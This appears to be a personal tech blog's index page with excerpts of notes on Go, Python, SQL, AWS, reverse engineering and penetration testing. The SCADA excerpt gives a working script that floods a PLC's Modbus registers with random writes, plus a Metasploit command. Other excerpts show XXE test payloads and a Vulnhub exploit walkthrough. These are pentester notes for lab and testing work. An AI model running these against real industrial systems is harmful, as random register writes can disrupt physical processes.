Golang Notes

This will encompass things that I find useful and end up looking up later when I haven’t written go in a while. Installation Ubuntu dl_link='https://dl.google.com/go/go1.15.7.linux-amd64.tar.gz' wget -c $dl_link -O - | sudo tar -xz -C /usr/local echo "" >> ~/.bashrc echo '# Golang exports' >> ~/.bashrc echo 'export PATH="$PATH:$:/usr/local/go/bin"' >> ~/.bashrc echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc # Test: go version Resource: https://golang.org/doc/install Start New Project This will create the project:...

June 18, 2018 · Jayson Grace

Reversing Notes

Environment Setup VMWare everything in a VLAN Remnux linux box - has things like iptables rules which accept traffic from any ip that connects to it and a fake dns tool. Process Monitor Useful for seeing what processes are spawned with a given running program. Used to get real-time information. Process hacker is an open source alternative. Process Explorer Determine what files, DLLs, and registry keys are associated with open processes....

April 24, 2018 · Jayson Grace

Interfacing with Oracle DBs

This was so much of a pain in the ass to figure out that I decided that I would compile a whole post specifically around useful information for this topic. To get started, download SQLDeveloper through Oracle’s site (you’ll need to register). So far I’ve tested this on OSX. Establishing a connection Under the Connections tab, click the green plus button Specify Basic for the connection type Put in the Connection name, Username, Password, Hostname, and Port For SID, put in the hostname without the domain....

April 19, 2018 · Jayson Grace

SCADA Security Notes

Modbus write random registers from pymodbus.client.sync import ModbusTcpClient import multiprocessing import random from multiprocessing import TimeoutError client = ModbusTcpClient('[target]') client.connect() def write(reg): client.write_register(reg+1, random.randint(1, 100)) print('reg:' + str(reg)) if __name__ == '__main__': while True: p = multiprocessing.Pool(2) try: p.map(write, [x for x in range(20)]) except TimeoutError: pass except Exception as e: print(e) exit() client.close() Read and write data to a PLC with metasploit use auxiliary/scanner/scada/modbusclient set DATA_ADDRESS 1 set RHOST [target] set ACTION READ_REGISTERS set NUMBER 19 run

April 7, 2018 · Jayson Grace

Python Notes

This will encompass things that I find useful and end up looking up later when I haven’t coded in a while. Useful functions Read file line-by-line and print each line def print_lines(file): with open(file) as f: for line in f: print(line) Read file into list def return_list(file): with open(file) as f: list = f.readlines() return list Remove line from a file containing a specified string def remove_line_containing_string(file): f = open(file, 'r') contents = f....

January 3, 2018 · Jayson Grace

SQL Cheatsheet

Generic Update field UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition; Get first row of data from table SELECT * FROM <table_name> LIMIT 1; Single-line comment -- stuff to comment out Multi-line comment /** stuff to comment out **/ Delete the last n rows from a table DELETE FROM `table` WHERE `table`.`tableID` in (SELECT TOP 500 tableID FROM table ORDER BY tableID DESC) Delete the first n rows from a table DELETE FROM `table` WHERE `table`....

November 29, 2017 · Jayson Grace

Modernizing Techvomit

In case it wasn’t obvious, this site runs on Ghost. I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result....

October 2, 2017 · Jayson Grace

AWS Cheatsheet

This contains various commands and information that I find useful for AWS work. Install latest version of AWS CLI on linux curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip sudo ./aws/install Resource: https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html Backup instance via UI Go to your instance Right click and select Image from the dropdown Click Create Image Give your backup a name and description Click No reboot if you want your instance to stay in a running state Click Create Image At this point you should be able to find the AMI that is associated with your backup under AMIs....

September 26, 2017 · Jayson Grace

Web Application Penetration Testing Notes

XXE Valid use case This is a nonmalicious example of how external entities are used: <?xml version="1.0" standalone="no" ?> <!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]> <copyright>&c;</copyright> Resource: https://xmlwriter.net/xml_guide/entity_declaration.shtml Testing methodology Once you’ve intercepted the POST to the vulnerable page, see if you can get the system to do what it would normally, but with entities: <?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!...

September 19, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM. Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities. Observe /license.txt - it will inform us that the target web application is running BuilderEngine. Search for an exploit we can use: searchsploit builderengine View the source for the exploit: searchsploit -x 40390 Copy the exploit code into exploit....

March 27, 2017 · Jayson Grace